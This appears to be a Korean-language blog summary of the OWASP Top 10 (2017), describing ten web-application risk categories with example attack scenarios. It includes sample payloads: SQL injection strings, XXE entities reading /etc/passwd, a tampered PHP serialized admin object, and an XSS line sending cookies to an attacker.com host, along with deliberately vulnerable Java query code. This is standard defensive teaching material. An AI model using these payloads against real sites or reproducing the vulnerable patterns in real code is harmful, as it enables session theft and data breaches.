OWASP TOP 10(2017) 간단 정리

[OWASP TOP 10]

OWASP Top 10 : 개발자 및 웹 애플리케이션 보안을 위한 표준 문서

[2013 -> 2017 OWASP TOP 10]

1) A1 : 2017-Injection (삽입)

Exploitability(심각도) 3, Prevalence(발생빈도) 2, Detectability(탐지가능성) 3, Technical(기술적난이도) 3

- SQL, NoSQL, OS 및 LDAP 삽입과 같은 삽입성 보안약점은 신뢰할 수없는 데이터가 명령 또는 쿼리의 일부로 인터프리터에 전송 될 때 발생합니다. 공격자 데이터는 인터프리터가 의도하지 않은 명령을 실행하거나 적절한 권한 없이 데이터에 액세스하도록 속일 수 있습니다.

 

공격 시나리오 예

-----------------------------------------------------------------------------------------------

시나리오 # 1 : 애플리케이션은 다음과 같은 취약한 SQL 호출을 구성 할 때 신뢰할 수없는 데이터를 사용합니다. 시나리오 # 2 : 마찬가지로 프레임 워크에 대한 애플리케이션의 맹신 신뢰로 인해 여전히 취약한 쿼리가 발생할 수 있습니다 (예 : Hibernate Query Language (HQL)). 두 경우 모두 공격자는 브라우저에서 'id'매개 변수 값을 수정하여 '또는'1 '='1을 전송합니다. 예 : 이렇게하면 accounts 테이블의 모든 레코드를 반환하도록 두 쿼리의 의미가 변경됩니다. 더 위험한 공격은 데이터를 수정 또는 삭제하거나 저장 프로 시저를 호출 할 수도 있습니다.

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

 

Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'");

 

http://example.com/app/accountView?id=' or '1'='1

-----------------------------------------------------------------------------------------------

2) A2 : 2017-Broken Authentication (취약한 인증)

Exploitability(심각도) 3, Prevalence(발생빈도) 2, Detectability(탐지가능성) 2, Technical(기술적난이도) 3

- 인증 및 세션 관리와 관련된 애플리케이션 기능이 종종 잘못 구현되어 공격자가 암호, 키 또는 세션 토큰을 손상 시키거나 다른 구현 결함을 악용하여 다른 사용자의 신원을 일시적 또는 영구적으로 가정 할 수 있습니다.

 

* 무차별 대입 또는 기타 자동화 된 공격을 허용합니다.

* "Password1"또는 "admin / admin"과 같은 기본 암호, 취약하거나 잘 알려진 암호를 허용합니다.

* 안전하지 않은 "지식 기반 답변"과 같이 취약하거나 비효율적 인 자격 증명 복구 및 암호 분실 프로세스를 사용합니다.

* 일반 텍스트, 암호화 또는 약하게 해시 된 암호를 사용합니다. ( A3 : 2017- 민감한 데이터 노출 참조 ).

* 다단계 인증이 없거나 비효율적입니다.

* URL에 세션 ID를 노출합니다 (예 : URL 재 작성).

* 로그인 성공 후 세션 ID를 교체하지 않습니다.

* 세션 ID를 제대로 무효화하지 않습니다. 사용자 세션 또는 인증 토큰 (특히 SSO (Single Sign-On) 토큰)은 로그 아웃 또는 비활성 기간 동안 제대로 무효화되지 않습니다.

 

3) A3 : 2017-Sensitive Data Exposure(민감한 데이터 노출)

Exploitability(심각도) 2, Prevalence(발생빈도) 3, Detectability(탐지가능성) 2, Technical(기술적난이도) 3

- 공격자는 암호화를 직접 공격하는 대신 키를 훔치고, 중간자 공격을 실행하거나, 전송 중이거나 브라우저와 같은 사용자 클라이언트에서 서버에서 일반 텍스트 데이터를 가로챕니다.

- 가장 일반적인 결함은 단순히 민감한 데이터를 암호화하지 않는 것입니다. 암호화가 사용되면 약한 키 생성 및 관리, 약한 알고리즘, 프로토콜 및 암호 사용이 일반적이며 특히 약한 암호 해싱 저장 기술의 경우에 노출되기 쉽습니다. 전송중인 데이터의 경우 서버 측 약점은 주로 감지하기 쉽지만 미사용 데이터에는 어렵습니다.

 

* 데이터가 일반 텍스트로 전송되는지 확인필요(HTTP, SMTP 및 FTP와 같은 프로토콜과 관련이 있음). 외부 인터넷 트래픽은 특히 위험합니다. 로드 밸런서, 웹 서버 또는 백엔드 시스템 간의 모든 내부 트래픽을 확인합니다.

* 기본적으로 또는 이전 코드에서 사용되는 오래되거나 취약한 암호화 알고리즘이 있습니까?

* 기본 암호화 키가 사용 중이거나 약한 암호화 키가 생성 또는 재사용되었거나 적절한 키 관리 또는 순환이 누락 되었습니까?

* 암호화가 적용되지 않습니까? 예를 들어 사용자 에이전트 (브라우저) 보안 지침 또는 헤더가 누락 되었습니까?

* 사용자 에이전트 (예 : 앱, 메일 클라이언트)가 수신 된 서버 인증서가 유효한지 확인하지 않습니까?

 

4) A4 : 2017-XML External Entities (XXE) (XML 외부 엔터티(XXE))

Exploitability(심각도) 2, Prevalence(발생빈도) 2, Detectability(탐지가능성) 3, Technical(기술적난이도) 3

- 오래되거나 잘못 구성된 XML 프로세서는 XML 문서 내에서 외부 엔터티 참조를 평가합니다. 외부 엔터티는 파일 URI 처리기, 내부 파일 공유, 내부 포트 검색, 원격 코드 실행 및 서비스 거부 공격을 사용하여 내부 파일을 공개하는 데 사용할 수 있습니다.

- 공격자는 취약한 코드, 종속성 또는 통합을 악용하여 XML을 업로드하거나 XML 문서에 악의적인 코드를 포함 할 수 있는 경우 취약한 XML 프로세서를 악용 할 수 있습니다.

 

공격 시나리오 예

-----------------------------------------------------------------------------------------------

시나리오 # 1 : 공격자가 서버에서 데이터 추출을 시도합니다. 시나리오 # 2 : 공격자가 위의 ENTITY 줄을 다음과 같이 변경하여 서버의 사설 네트워크를 조사합니다. 시나리오 # 3 : 공격자는 잠재적으로 무한한 파일을 포함하여 서비스 거부 공격을 시도합니다.

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<foo>&xxe;</foo>

 

<!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]>

 

<!ENTITY xxe SYSTEM "file:///dev/random" >]>

-----------------------------------------------------------------------------------------------

5) A5:2017-Broken Access Control (취약한 접근제어)

Exploitability(심각도) 2, Prevalence(발생빈도) 2, Detectability(탐지가능성) 2, Technical(기술적난이도) 3

- 인증 된 사용자가 수행 할 수 있는 작업에 대한 제한이 종종 제대로 시행되지 않습니다. 공격자는 이러한 결함을 악용하여 다른 사용자의 계정에 액세스하고, 중요한 파일을 보고, 다른 사용자의 데이터를 수정하고, 액세스 권한을 변경하는 등의 무단 기능 및 데이터에 액세스 할 수 있습니다.

 

공격 시나리오 예

-----------------------------------------------------------------------------------------------

pstmt.setString(1, request.getParameter("acct"));

ResultSet results = pstmt.executeQuery( );

 

http://example.com/app/accountInfo?acct=notmyacct

 

http://example.com/app/getappInfo

http://example.com/app/admin_getappInfo

-----------------------------------------------------------------------------------------------

6) A6:2017-Security Misconfiguration(보안 구성 오류)

Exploitability(심각도) 3, Prevalence(발생빈도) 3, Detectability(탐지가능성) 3, Technical(기술적난이도) 2

- 보안 구성 오류가 가장 일반적으로 발생하는 문제입니다. 이는 일반적으로 안전하지 않은 기본 구성, 불완전하거나 임시 구성, 개방형 클라우드 스토리지, 잘못 구성된 HTTP 헤더 및 민감한 정보가 포함 된 자세한 오류 메시지의 결과로 발생합니다. 모든 운영 체제, 프레임 워크, 라이브러리 및 애플리케이션을 안전하게 구성해야 할뿐만 아니라 적시에 패치 / 업그레이드를 해야합니다.

 

공격 시나리오 예

-----------------------------------------------------------------------------------------------

시나리오 # 1 : 애플리케이션 서버는 프로덕션 서버에서 제거되지 않은 샘플 애플리케이션과 함께 제공됩니다. 이러한 샘플 애플리케이션에는 공격자가 서버를 손상시키는 데 사용하는 알려진 보안 결함이 있습니다. 이러한 응용 프로그램 중 하나가 관리 콘솔이고 기본 계정이 변경되지 않은 경우 공격자는 기본 암호로 로그인하고 인계합니다.

시나리오 # 2 : 서버에서 디렉토리 목록이 비활성화되지 않습니다. 공격자는 단순히 디렉토리를 나열 할 수 있음을 발견합니다. 공격자는 컴파일 된 Java 클래스를 찾아 다운로드하여 코드를 보기 위해 디 컴파일 및 리버스 엔지니어링 합니다. 그런 다음 공격자는 애플리케이션에서 심각한 액세스 제어 결함을 발견합니다.

시나리오 # 3: 응용 프로그램 서버의 구성을 통해 스택 추적과 같은 자세한 오류 메시지를 사용자에게 반환 할 수 있습니다. 이는 취약한 것으로 알려진 구성 요소 버전과 같은 민감한 정보 또는 근본적인 결함을 잠재적으로 노출합니다.

시나리오 # 4 : 클라우드 서비스 공급자는 다른 CSP 사용자가 인터넷에 공개하는 기본 공유 권한을 가지고 있습니다. 이를 통해 클라우드 스토리지에 저장된 민감한 데이터에 액세스 할 수 있습니다.

-----------------------------------------------------------------------------------------------

7) A7:2017-Cross-Site Scripting XSS(크로스사이트 스크립트)

Exploitability(심각도) 3, Prevalence(발생빈도) 3, Detectability(탐지가능성) 3, Technical(기술적난이도) 2

- XSS 결함은 애플리케이션이 적절한 유효성 검사 또는 이스케이프없이 새 웹 페이지에 신뢰할 수 없는 데이터를 포함하거나 HTML을 만들 수있는 브라우저 API를 사용하여 사용자가 제공 한 데이터로 기존 웹 페이지를 업데이트하거나 자바 스크립트, XSS를 통해 공격자는 피해자의 브라우저에서 스크립트를 실행하여 사용자 세션을 가로채거나 웹 사이트를 손상 시키거나 사용자를 악성 사이트로 리디렉션 할 수 있습니다.

 

[XSS의 3가지 종류]

* Reflected XSS : 응용 프로그램 또는 API는 HTML 출력의 일부로 유효성 검사 및 이스케이프 처리되지 않은 사용자 입력을 포함합니다. 공격이 성공하면 공격자가 피해자의 브라우저에서 임의의 HTML 및 JavaScript를 실행할 수 있습니다. 일반적으로 사용자는 악성 워터 링 홀 웹 사이트, 광고 등과 같이 공격자가 제어하는 ​​페이지를 가리키는 일부 악성 링크와 상호 작용해야합니다.

* Stored XSS : 응용 프로그램 또는 API는 나중에 다른 사용자 또는 관리자가 볼 수 있는 삭제되지 않은 사용자 입력을 저장합니다. 저장된 XSS는 종종 높거나 중요한 위험으로 간주됩니다.

* DOM XSS: 페이지에 공격자가 제어 할 수 있는 데이터를 동적으로 포함하는 JavaScript 프레임워크, 단일 페이지 애플리케이션 및 API는 DOM XSS에 취약합니다. 이상적으로는 애플리케이션이 공격자가 제어 할 수있는 데이터를 안전하지 않은 JavaScript API로 보내지 않습니다.

 

일반적인 XSS 공격에는 세션 도용, 계정 탈취, MFA 우회, DOM 노드 교체 또는 손상 (트로이 목마 로그인 패널 등), 악성 소프트웨어 다운로드, 키 로깅 및 기타 클라이언트 측 공격과 같은 사용자 브라우저에 대한 공격이 포함됩니다.

 

공격 시나리오 예

-----------------------------------------------------------------------------------------------

시나리오 # 1 : 애플리케이션이 유효성 검사 또는 이스케이프없이 다음 HTML 스니펫의 구성에 신뢰할 수없는 데이터를 사용합니다 . 공격자는 브라우저에서 'CC'매개 변수를 다음과 같이 수정합니다. 이 공격으로 인해 피해자의 세션 ID가 공격자의 웹 사이트로 전송됩니다. 공격자가 사용자의 현재 세션을 가로 채도록 허용합니다. 참고 : 공격자는 XSS를 사용하여 애플리케이션이 사용할 수 있는 자동화 된 CSRF (Cross-Site Request Forgery) 방어를 무력화 할 수 있습니다.

(String) page += "<input name='creditcard' type='TEXT'

value='" + request.getParameter("CC") + "'>";

 

'><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>'.

-----------------------------------------------------------------------------------------------

8) A8:2017-Insecure Deserialization(안전하지 않은 역 직렬화)

Exploitability(심각도) 1, Prevalence(발생빈도) 2, Detectability(탐지가능성) 2, Technical(기술적난이도) 3

- 안전하지 않은 역 직렬화는 종종 원격 코드 실행으로 이어집니다. 역 직렬화 결함이 원격 코드 실행으로 이어지지 않더라도 재생 공격, 주입 공격 및 권한 상승 공격을 포함한 공격을 수행하는 데 사용될 수 있습니다.

 

공격 시나리오 예

-----------------------------------------------------------------------------------------------

a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";

i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}

 

a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";

i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}

-----------------------------------------------------------------------------------------------

9) A9:2017-Using Components with Known Vulnerabilities(알려진 취약점이 있는 구성 요소 사용)

Exploitability(심각도) 2, Prevalence(발생빈도) 3, Detectability(탐지가능성) 2, Technical(기술적난이도) 2

- 라이브러리, 프레임 워크 및 기타 소프트웨어 모듈과 같은 구성 요소는 애플리케이션과 동일한 권한으로 실행됩니다. 취약한 구성 요소가 악용되는 경우 이러한 공격은 심각한 데이터 손실이나 서버 탈취를 촉진 할 수 있습니다. 알려진 취약성이 있는 구성 요소를 사용하는 애플리케이션과 API는 애플리케이션 방어를 약화시키고 다양한 공격과 영향을 미칠 수 있습니다.

 

공격 시나리오 예

-----------------------------------------------------------------------------------------------

시나리오 # 1 : 구성 요소는 일반적으로 응용 프로그램 자체와 동일한 권한으로 실행되므로 구성 요소의 결함으로 인해 심각한 영향을 받을 수 있습니다. 이러한 결함은 우발적 (예 : 코딩 오류) 또는 의도적 (예 : 구성 요소의 백도어) 일 수 있습니다. 발견 된 악용 가능한 구성 요소 취약점의 몇 가지 예는 다음과 같습니다.

* 서버에서 임의의 코드를 실행할 수 있는 Struts 2 원격 코드 실행 취약점 인 CVE-2017-5638 이 심각한 위반으로 인해 비난을 받았습니다.

* 사물 인터넷 (IoT) 은 패치하기가 어렵거나 불가능한 경우가 많지만 패치 적용의 중요성은 클 수 있습니다 (예 : 생체 의료 기기).

-----------------------------------------------------------------------------------------------

10) A10:2017-Insufficient Logging & Monitoring(불충분한 로깅 및 모니터링)

Exploitability(심각도) 2, Prevalence(발생빈도) 3, Detectability(탐지가능성) 1, Technical(기술적난이도) 2

 

- 불충분 한 로깅 및 모니터링은 사고 대응과의 누락 또는 비효율적 인 통합과 결합되어 공격자가 시스템을 추가 공격하고, 지속성을 유지하고, 더 많은 시스템으로 피벗하고, 데이터를 변조, 추출 또는 파괴 할 수 있습니다. 대부분의 침해 연구에 따르면 침해를 감지하는 데 걸리는 시간은 200 일 이상이며 일반적으로 내부 프로세스 또는 모니터링이 아닌 외부 당사자가 감지합니다.

 

공격 시나리오 예

-----------------------------------------------------------------------------------------------

시나리오 # 1 : 소규모 팀이 운영하는 오픈 소스 프로젝트 포럼 소프트웨어가 소프트웨어 결함을 사용하여 해킹 당했습니다. 공격자들은 다음 버전과 모든 포럼 콘텐츠가 포함 된 내부 소스 코드 저장소를 삭제했습니다. 소스는 복구 할 수 있지만 모니터링, 로깅 또는 경고의 부족으로 인해 훨씬 ​​더 심각한 침해가 발생했습니다. 이 문제로 인해 포럼 소프트웨어 프로젝트가 더 이상 활성화되지 않습니다.

시나리오 # 2 : 공격자는 공통 암호를 사용하여 사용자를 검색합니다. 이 비밀번호를 사용하여 모든 계정을 인계받을 수 있습니다. 다른 모든 사용자의 경우가 스캔은 하나의 잘못된 로그인 만 남겨 둡니다. 며칠 후 다른 암호로이 작업을 반복 할 수 있습니다.

시나리오 # 3: 미국의 한 주요 소매 업체가 첨부 파일을 분석하는 내부 맬웨어 분석 샌드 박스를 보유한 것으로 알려졌습니다. 샌드 박스 소프트웨어가 잠재적으로 원치 않는 소프트웨어를 감지했지만 아무도이 감지에 응답하지 않았습니다. 샌드박스는 외부 은행의 사기성 카드 거래로 인해 위반이 감지되기 ​​전에 한동안 경고를 생성했습니다.

-----------------------------------------------------------------------------------------------